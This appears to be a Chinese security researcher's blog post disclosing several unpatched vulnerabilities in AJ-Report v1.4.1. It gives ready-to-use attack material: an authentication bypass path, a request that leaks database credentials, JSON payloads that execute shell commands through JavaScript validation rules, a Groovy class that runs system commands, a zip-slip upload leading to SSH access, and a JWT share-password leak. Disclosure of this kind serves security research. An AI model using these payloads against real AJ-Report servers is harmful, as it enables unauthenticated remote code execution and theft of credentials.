aj-report 二次就业

前提

最新先知有人发了aj-report文章，看了看，是一个filter绕过，还有jwt，竟然还没修,这是两年前发表的AJ-Report_RCE。aj-report是我两年前学习代码审计审计的第一套代码，那时候藏了一些洞没写，所以现在重新看一看。环境v1.4.1。

0x01 filter 绕过

com.anjiplus.template.gaea.business.filter.TokenFilter.java

这获取了URL，然后判断是否包含“swagger-ui”或着”swagger-resources”，包含直接放行。

没什么好说的，鉴权绕过。

0x02 sql 信息泄漏

com.anji.plus.gaea.curd.controller.GaeaBaseController#pageList

直接查询dataSource的信息，然后把Dto信息全部直接放回，造成泄漏

Dto里面存在Collections集合，直接把配置信息放回出来。

结合一下，可以拿到数据库账号密码

1	`/;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10`

0x03 js执行命令

参考两年前发表的AJ-Report_RCE，(https://mp.weixin.qq.com/s/HsH_nEI5SyOP_Y9Qbm0A1w）

没有修复。

第一个点（validationRules参数校验点）

com.anjiplus.template.gaea.business.modules.dataset.service.impl.DataSetServiceImpl#testTransform

看方法实现

然后执行。

第二个点（js脚本）

com.anjiplus.template.gaea.business.modules.datasettransform.service.impl.JsTransformServiceImpl#getValueFromJs.java

这里两个地方都可以，也根本不用绕过。

{"dynSentence": "{\"apiUrl\":\"http://127.0.0.1:9095/dataSet/testTransform\",\"method\":\"GET\",\"header\":\"{\\\"Content-Type\\\":\\\"application/json;charset=UTF-8\\\"}\",\"body\":\"\"}","dataSetParamDtoList":[{"paramName":"","paramDesc":"","paramType":"","sampleItem":"","mandatory":true,"requiredFlag":2,"validationRules":"function verification(data){var se= new javax.script.ScriptEngineManager();var r = se.getEngineByExtension(\"js\").eval(\"new java.lang.ProcessBuilder('calc').start().getInputStream();\");result=new java.io.BufferedReader(new java.io.InputStreamReader(r));ss='';while((line = result.readLine()) != null){ss+=line};return ss;}"}],"dataSetTransformDtoList":[{"transformType":"js","transformScript":""}],"setType":"http"}

0x04 validationRules 命令执行

com.anjiplus.template.gaea.business.modules.datasetparam.controller.DataSetParamController#verification。java

其实看上面就知道，js的规则，然后走到eval。

com.anjiplus.template.gaea.business.modules.datasetparam.service.impl.DataSetParamServiceImpl#verification(com.anjiplus.template.gaea.business.modules.datasetparam.controller.dto.DataSetParamDto)

对应实现类，有绕过，套娃就行。

dto里面设置validationRules就行。

{"sampleItem":"1","validationRules":"function verification(data){var se= new javax.script.ScriptEngineManager();var r = se.getEngineByExtension(\"js\").eval(\"new java.lang.ProcessBuilder('whoami').start().getInputStream();\");result=new java.io.BufferedReader(new java.io.InputStreamReader(r));ss='';while((line = result.readLine()) != null){ss+=line};return ss;}"}

0x05 zip-spilf

com.anjiplus.template.gaea.business.modules.dashboard.controller.ReportDashboardController#importDashboard.java

对应的controller，传file流何code就好

com.anjiplus.template.gaea.business.modules.dashboard.service.impl.ReportDashboardServiceImpl#importDashboard 实现类

没有的zipEntry进行../ 过滤，导致zip目录穿越。

然后ssh 指定私钥连接。

0x06 大屏分享信息泄漏

com.anjiplus.template.gaea.business.modules.reportshare.controller.ReportShareController#detailByCode

对象实现类

根据shareCode可以获取到查询信息，然后加密后直接放回

jwt可以直接解密

直接可以获得分享密码。

0x07 java代码执行

还是数据集那个点，走java方式。

com.anjiplus.template.gaea.business.modules.dataset.service.impl.DataSetServiceImpl#testTransform

对应实现类

com.anjiplus.template.gaea.business.modules.datasettransform.service.impl.DataSetTransformServiceImpl#transform

com.anjiplus.template.gaea.business.modules.datasettransform.service.impl.GroovyTransformServiceImpl#transform

最后会来到GroovyClassLoader，进行处理，也就是我们写一个类给GroovyClassLoader加载就好了

import com.alibaba.fastjson.JSONObject;
import com.anjiplus.template.gaea.business.modules.datasettransform.service.IGroovyHandler;


import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLClassLoader;
import java.util.*;

public class test implements IGroovyHandler {
    @Override
    public List<JSONObject> transform(List<JSONObject> data) throws Exception {
        String execResult = new Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\A").next();
        return Arrays.asList(execResult.split("\\s+"));
    }
}